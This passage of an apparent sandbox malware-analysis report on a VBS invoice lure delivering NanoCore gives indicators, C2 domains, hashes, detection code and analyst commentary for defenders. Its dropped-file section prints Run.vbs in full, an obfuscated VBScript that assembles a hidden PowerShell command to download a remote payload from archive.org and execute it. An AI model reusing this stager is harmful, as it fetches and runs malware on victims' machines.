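            if p.image.lower() in SHELLS
            and any(c[2] == 443 for c in p.connections)
            and p.dropped]


# Constructed from the behaviour graph; PIDs are placeholders, not the report's.
PROCS: Dict[int, Proc] = {p.pid: p for p in [
    Proc(100, "wscript.exe"),
    Proc(200, "powershell.exe", parent=100,
         connections=[("ia601405.us.archive.org", "207.241.227.125", 443),
                      ("ia801408.us.archive.org", "207.241.228.148", 443)],
         dropped=["PowerShell_transcr....20210803203913.txt"]),
    Proc(300, "aspnet_compiler.exe", parent=200,
         connections=[("newjan.duckdns.org", "185.244.30.23", None)],   # dst port not given in the graph
         dropped=["run.dat"]),
    Proc(301, "aspnet_compiler.exe", parent=200,
         connections=[("dangomra.duckdns.org", "185.244.30.23", None)]),
    Proc(302, "conhost.exe", parent=200),
]}

if __name__ == "__main__":
    for finding in find_injected_beacons(PROCS):
        print("injected beacon:", finding)
    for stage in stager_downloads(PROCS):
        print("stager:", stage)
```

Keying on the lineage rather than on aspnet_compiler.exe alone is what keeps the rule useful: the hollowed binary can be swapped for any other .NET framework executable, but a build tool started by PowerShell under a script host and then talking to duckdns.org is not something a build pipeline does.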


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
22.2.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen7
20.2.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
20.2.aspnet_compiler.exe.3828a18.7.unpack | 100% | Avira | TR/NanoCore.fadte

      Domains

      No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://gro.sndkcud.armognad | 0% | Avira URL Cloud | safe
http://certificates.godaddy.repo | 0% | Avira URL Cloud | safe
newjan.duckdns.org | 0% | Avira URL Cloud | safe
http://certificates.godaddy. | 0% | Avira URL Cloud | safe
https://go.micro | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dangomra.duckdns.org | 185.244.30.23 | true | true | (none) | unknown
ia601405.us.archive.org | 207.241.227.125 | true | false | (none) | high
newjan.duckdns.org | 185.244.30.23 | true | true | (none) | unknown
ia801408.us.archive.org | 207.241.228.148 | true | false | (none) | high

Both duckdns.org names resolve to the same address, 185.244.30.23, so the two injected aspnet_compiler.exe instances (one contacting newjan.duckdns.org, the other dangomra.duckdns.org) reach a single host behind two dynamic-DNS labels; the archive.org hosts are the payload download stage, not C2.

              Contacted URLs

Name                          Malicious  Antivirus Detection    Reputation
https://gro.sndkcud.armognad  true       Avira URL Cloud: safe  unknown
newjan.duckdns.org            true       Avira URL Cloud: safe  unknown

              URLs from Memory and Binaries

http://crl.godaddy.com/gdroot-g2.crl0F
    Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmp
    Malicious: false; Reputation: high
https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt
    Source: PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt.3.dr
    Malicious: false; Reputation: high
http://certificates.godaddy.repo
    Source: powershell.exe, 00000003.00000003.971057099.000001EA3FEC1000.00000004.00000001.sdmp
    Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
https://certs.godaddy.com/repository/0
    Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmp
    Malicious: false; Reputation: high
http://certificates.godaddy.
    Source: powershell.exe, 00000003.00000003.971057099.000001EA3FEC1000.00000004.00000001.sdmp
    Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
https://ia801408.us.archive.org/20/items/server_202108/Server.txt
    Source: Run.vbs.3.dr
    Malicious: false; Reputation: high
http://google.com
    Source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
    Malicious: false; Reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: aspnet_compiler.exe, 00000016.00000002.1173461884.0000000002C61000.00000004.00000001.sdmp
    Malicious: false; Reputation: high
https://go.micro
    Source: powershell.exe, 00000003.00000003.669481789.000001EA294EC000.00000004.00000001.sdmp
    Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
http://certs.godaddy.com/repository/1301
    Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmp
    Malicious: false; Reputation: high

                            Contacted IPs


                            Public

IP               Domain                   Country        ASN     ASN Name            Malicious
207.241.227.125  ia601405.us.archive.org  United States  7941    INTERNET-ARCHIVEUS  false
207.241.228.148  ia801408.us.archive.org  United States  7941    INTERNET-ARCHIVEUS  false
185.244.30.23    dangomra.duckdns.org     Netherlands    209623  DAVID_CRAIGGG       true

                            General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 458883
Start date: 03.08.2021
Start time: 20:38:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 38s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 3G1J49A6V_Invoice.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winVBS@12/11@16/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .vbs
• Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 168.61.161.212, 23.211.6.115, 13.88.21.125, 20.82.210.154, 20.54.110.249, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.235, 80.67.82.211, 20.50.102.62
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

Time      Type             Description
20:39:14  API Interceptor  39x Sleep call for process: powershell.exe modified
20:41:46  API Interceptor  777x Sleep call for process: aspnet_compiler.exe modified

                            Joe Sandbox View / Context

                            IPs

Match            Associated Sample Name / URL               Detection
207.241.227.125  Property.vbs                               malicious
                 Booking_confirmation.vbs                   malicious
                 Report-11003456773312.vbs                  malicious
                 Report.vbs                                 malicious
                 Report.110034567733.vbs                    malicious
                 AppraisalReport.vbs                        malicious
                 Appraisal11002275444900.vbs                malicious
207.241.228.148  PAYMENT COPY.ppt                           malicious
                 8b664227_by_Libranalysis.ppt               malicious
                 KUP ZAMÓWIENIE-34002174.ppt                malicious
                 280fdaa5_by_Libranalysis.ppt               malicious
                 SiggiaW.vbs                                malicious
                 DHL SHIPMENT NOTIFICATION,6207428452.ppt   malicious
                 Analysis Reports.ppt                       malicious
                 original_file.ppt                          malicious
                 Remittance_PO-89488484.ppt                 malicious
                 Confirm Order for AKTEK Company_E4117.ppt  malicious
                 PO#070421APRIL-REV.ppt                     malicious
                 final po PP-11164.ppt                      malicious
                 NR52.vbs                                   malicious
                 7.pps                                      malicious
                 CONTRACT AGRREMENT FORM.ppt                malicious
                 Order 122001-220.ppt                       malicious

                                                                          Domains

Match                    Associated Sample Name / URL               Detection  Context
ia601405.us.archive.org  Property.vbs                               malicious  207.241.227.125
                         Booking_confirmation.vbs                   malicious  207.241.227.125
                         Report-11003456773312.vbs                  malicious  207.241.227.125
                         Report.vbs                                 malicious  207.241.227.125
                         Report.110034567733.vbs                    malicious  207.241.227.125
                         AppraisalReport.vbs                        malicious  207.241.227.125
                         Appraisal11002275444900.vbs                malicious  207.241.227.125
ia801408.us.archive.org  PAYMENT COPY.ppt                           malicious  207.241.228.148
                         8b664227_by_Libranalysis.ppt               malicious  207.241.228.148
                         KUP ZAMÓWIENIE-34002174.ppt                malicious  207.241.228.148
                         280fdaa5_by_Libranalysis.ppt               malicious  207.241.228.148
                         SiggiaW.vbs                                malicious  207.241.228.148
                         DHL SHIPMENT NOTIFICATION,6207428452.ppt   malicious  207.241.228.148
                         Analysis Reports.ppt                       malicious  207.241.228.148
                         original_file.ppt                          malicious  207.241.228.148
                         Remittance_PO-89488484.ppt                 malicious  207.241.228.148
                         Confirm Order for AKTEK Company_E4117.ppt  malicious  207.241.228.148
                         PO#070421APRIL-REV.ppt                     malicious  207.241.228.148
                         final po PP-11164.ppt                      malicious  207.241.228.148
                         NR52.vbs                                   malicious  207.241.228.148
                         7.pps                                      malicious  207.241.228.148
                         CONTRACT AGRREMENT FORM.ppt                malicious  207.241.228.148
                         Order 122001-220.ppt                       malicious  207.241.228.148
                         SKM_36721012514070-2.ppt                   malicious  207.241.228.148
newjan.duckdns.org       LxYbtlP5nB.exe                             malicious  185.244.30.23
                         Invoice#282730.exe                         malicious  79.134.225.9
                         Urban Receipt.exe                          malicious  79.134.225.9
                         d9hGzIR8mh.exe                             malicious  194.5.97.75
                         6554353_Payment_Invoice.exe                malicious  194.5.97.75

The newjan.duckdns.org rows show the name resolving to three different addresses across earlier submissions (185.244.30.23, 79.134.225.9, 194.5.97.75), which is the usual pattern for a dynamic-DNS C2: pivot and block on the hostname, and treat any single IP as a short-lived indicator.

                                                                          ASN

Match               Associated Sample Name / URL          Detection  Context
INTERNET-ARCHIVEUS  Invoice_#.vbs                         malicious  207.241.227.120
                    INVOICE.vbs                           malicious  207.241.228.140
                    #WUHD09.vbs                           malicious  207.241.227.116
                    Property.vbs                          malicious  207.241.227.125
                    Invoice.vbs                           malicious  207.241.227.120
                    Booking_confirmation.vbs              malicious  207.241.228.144
                    NCL_Mandatory_Form.vbs                malicious  207.241.227.110
                    HR-Ageing-Report.ppt                  malicious  207.241.227.129
                    Reciept_ups.vbs                       malicious  207.241.227.123
                    Invoice #20291.vbs                    malicious  207.241.227.113
                    45678.vbs                             malicious  207.241.230.172
                    New order (DDV21-0014) TOKYO HIP.ppt  malicious  207.241.228.154
                    SO-19844 EIDCO.ppam                   malicious  207.241.228.150
                    IdDetails.ppam                        malicious  207.241.235.73
                    New Purchase Order-030220.ppt         malicious  207.241.228.145
                    DHL_119040 Beleg.ppt                  malicious  207.241.228.145
                    2UUlKfJYJN.exe                        malicious  207.241.224.2
                    Drawing for Our New Order.ppt         malicious  207.241.228.158
                    IdDetails.ppam                        malicious  207.241.235.73
                    IdDetails.ppam                        malicious  207.241.235.73

                                                                          JA3 Fingerprints

Match: 54328bd36c14bd82ddaa0c04b25ed9ad (context for every entry: 207.241.227.125, 207.241.228.148)

Associated Sample Name / URL           Detection
Invoice_#.vbs                          malicious
RoyalMail_Requestform0729.exe          malicious
RoyalMail_Requestform1.exe             malicious
MFS0175, MFS0117 MFS0194.exe           malicious
INVOICE.vbs                            malicious
INQUIRY REQUIREMENTS.exe               malicious
JUP2A9ptp5.exe                         malicious
7vd7MuxjGd.exe                         malicious
KITCOFiberOptics_CompanyCertifcate.exe malicious
LOPEZ CV.exe                           malicious
PO_1994.exe                            malicious
temple.exe                             malicious
transferred $95,934.55 pdf.exe         malicious
gunzipped.exe                          malicious
Remittance copy.pdf.exe                malicious
09087900900000000.exe                  malicious
cjfq66QXN5.exe                         malicious
INV. 736392 Scan pdf.exe               malicious
#WUHD09.vbs                            malicious
Property.vbs                           malicious

Every associated sample shares the same two archive.org destinations, so this JA3 value characterises the TLS client used by the PowerShell download stage rather than the NanoCore payload that follows it. A fingerprint tied to a common Windows client stack will also match benign traffic; use it only to corroborate the archive.org download pattern, not as a stand-alone detection.

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\Public\Run\Run.vbs
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):908
                                                                          Entropy (8bit):5.494432834103593
                                                                          Encrypted:false
                                                                          SSDEEP:12:PvzC6yh48+XZi8fyAixHhZyMAHifvAeRoUVzM8NoeT8OobLqhP/v1VJv9Os/s:Pv2H+JitbfAMvAeym6bPiJFxs
                                                                          MD5:C0A8D3A40D4A6B9F6913A04A6F2AE345
                                                                          SHA1:8952D8F47DB152581200B0497B06BD1E9DE9AFCD
                                                                          SHA-256:460AD0D8DA835DCE91DB836BB0BE306FD369EFFEB626CAF543AA299BD4697DA0
                                                                          SHA-512:31CB93334DF71B755DCFE54210DD3EED2C32DE8070561425E2DD495A4934C9EBA2E0A333E3FC8338BA06C444E64ABE967A435139AB90050BB87D4A2859C57E30
                                                                          Malicious:false
                                                                          Preview: Dim FBI..Set FBI= CreateObject("WScript.S"&"HELL")..Donal=chr(80) &"O" & Chr(87)..Trump = Chr(69)..mike = Chr(82) & "s"&"H" & Chr(69)..pompeo = Chr(76)..Elon =Chr(76)&" $TRUMP ='https://ia801408.us.archive.org/20/items/server_202108/Server.txt';$"..WHO = "B ='E"..ERO = "TH COINt.WTF COINlIOSNT'.Re"..AA = "place('ETH COIN','nE').Repl"..BB = "ace('TF COIN','EbC').Rep"..CC = "lace('OS','e');"..MUSK = "$CC = 'DOS COIN L"&"SOSCOINnG'.Rep"..DD = "lace('S COIN ','Wn').Repl"..FF = "ace('SO','oaD').Rep"..GG = "lace('COIN','TrI');"..SHIB =""..INU ="$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Rep"..KK = "lace('os COIN','X(n`e').Repl"..TT = "ace('BTC COIN','-Ob').Rep"..ENB = "lace('TH COIN','`c`T');"..PUMP ="&('I'+'E"..OS = "X')($A -J"..SOS = "oin '')|&('I'+'E"..EOS = "X');"..COIN = Donal+Trump++mike+pompeo+Elon+WHO+ERO+AA+BB+CC+MUSK+DD+FF+GG+SHIB+INU+KK+TT+ENB+PUMP+OS+SOS+EOS+""..FBI.Run COIN,0..
                                                                          C:\Users\Public\Run\Windows.lnk
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):690
                                                                          Entropy (8bit):3.03893890594732
                                                                          Encrypted:false
                                                                          SSDEEP:12:8gl020sXUd9Cr/YOmuBJrXE+1gGYNQS0qv4t2Y+xIBjK:8mxBJrXE+1fod0ql7aB
                                                                          MD5:B643B57B5474469B70FEC6153C4B2AD8
                                                                          SHA1:AD9974BC091487FBBF2AC38D06B41B848AF4B5B9
                                                                          SHA-256:BA8AC47D1FA2059B60C96DD4C3490E3C946D82CF35C4574DA2C28E0AF6642AEE
                                                                          SHA-512:985F5B9D41770A968B9630DA34B3BD30A95259CF8AF1A73BF77B4F72289435851FCB38CBE48C463047EC7EAEC3003BE189573C8AE8B11AD96A38F5B1D5588F26
                                                                          Malicious:false
                                                                          Preview: L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........Public..>............................................P.u.b.l.i.c.....J.1...........Run.8............................................R.u.n.....b.2...........Windows.exe.H............................................W.i.n.d.o.w.s...e.x.e...........\.W.i.n.d.o.w.s...e.x.e.......................... }.j..L..^6.C.T................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):57895
                                                                          Entropy (8bit):5.080080220298808
                                                                          Encrypted:false
                                                                          SSDEEP:1536:cIu+z30xyJJV3CNBQkj22h4iUxxaVkflJnLvAHPqd+KSS3SOdB8NVzltAHkrNKer:ru+z30IJJV3CNBQkj22qiUxaVkflJnLu
                                                                          MD5:E494C8B04CCA7990028009C5A768629C
                                                                          SHA1:42B21DC378D323E339D49BDC8CD4F96DC5837358
                                                                          SHA-256:AB50EF20F6B7CFF39117E3E89980CDD2FCECBCEDDDE456FECED62FC3AED475BF
                                                                          SHA-512:E06018D7C94E7FFD45407DCBA4282C9F20D4736867AFC8A0EFF016A7AFA8210FB365A8BA3B9FD824C25744C13BA1D6F8390FD88BEFF44EE2C0332BE619A932CB
                                                                          Malicious:false
                                                                          Preview: PSMODULECACHE.X...........I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crtkfx14.gxu.psm1
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcg2nrvy.g5h.ps1
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1856
                                                                          Entropy (8bit):7.089541637477408
                                                                          Encrypted:false
                                                                          SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhL
                                                                          MD5:30D23CC577A89146961915B57F408623
                                                                          SHA1:9B5709D6081D8E0A570511E6E0AAE96FA041964F
                                                                          SHA-256:E2130A72E55193D402B5F43F7F3584ECF6B423F8EC4B1B1B69AD693C7E0E5A9E
                                                                          SHA-512:2D5C5747FD04F8326C2CC1FB313925070BC01D3352AFA6C36C167B72757A15F58B6263D96BD606338DA055812E69DDB628A6E18D64DD59697C2F42D1C58CC687
                                                                          Malicious:false
                                                                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):3.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:+4:+4
                                                                          MD5:78D031F87BA3B82386BA23B6397F97AF
                                                                          SHA1:8B4F4CAF2B6CDD94A28211900B425BDA89999B0C
                                                                          SHA-256:B0F00CABFE6DF9D196E05BB3A8D3563901AB428D4992D5E75D78302292F8C1DC
                                                                          SHA-512:B0950459095DA5E6A3B3493BBEA0FC332DC1252513F405B608F2F8507C10B35D64BC20387B283E2FB9D58FE4B68DF120A3E0CC375CC3A5C69153423C0357F9AE
                                                                          Malicious:true
                                                                          Preview: ...Y.V.H
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):40
                                                                          Entropy (8bit):5.153055907333276
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                                                                          MD5:4E5E92E2369688041CC82EF9650EDED2
                                                                          SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                                                                          SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                                                                          SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                                                                          Malicious:false
                                                                          Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):327768
                                                                          Entropy (8bit):7.999367066417797
                                                                          Encrypted:true
                                                                          SSDEEP:6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
                                                                          MD5:2E52F446105FBF828E63CF808B721F9C
                                                                          SHA1:5330E54F238F46DC04C1AC62B051DB4FCD7416FB
                                                                          SHA-256:2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
                                                                          SHA-512:C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
                                                                          Malicious:false
                                                                          Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):1054
                                                                          Entropy (8bit):2.926336827490569
                                                                          Encrypted:false
                                                                          SSDEEP:12:8gl0IsXowAOcQ/tz0/CSLwrHj4/3BVwzyDilVBJrXE+1gTCNfBT/v4t2Y+xIBjK:8XLDWLgD4/BUBJrXE+1Vpd7aB
                                                                          MD5:E51CB0EA03B1F2D0835C8E1201DA23CC
                                                                          SHA1:E464C5208721B6CEA60BFB63A3E09B2AEF2E4475
                                                                          SHA-256:26BAAC4EF3C57AEA88EFB7DECCFC5AEE293629144E5B4FA26B46A1E82AFEB6DD
                                                                          SHA-512:D6E0EDB184C0F0D984619205B1F67E3217FFDD502769EAD433FC9EF0C35BE1A0B731F1E92D3C91D11F6CBD262A9331444F46F50E752B3BC53E3AA332866BA3EC
                                                                          Malicious:false
                                                                          Preview: L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........Templates.D............................................T.e.m.p.l.a.t.e.s.....b.2...........Windows.exe.H............................................W.i.n.d.o.w.s...e.x.e...........\.W.i.n.d.o.w.s...e.x.e.............y.............>.e.L.:..er.=y...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.
                                                                          C:\Users\user\Documents\20210803\PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4209
                                                                          Entropy (8bit):5.61058983888715
                                                                          Encrypted:false
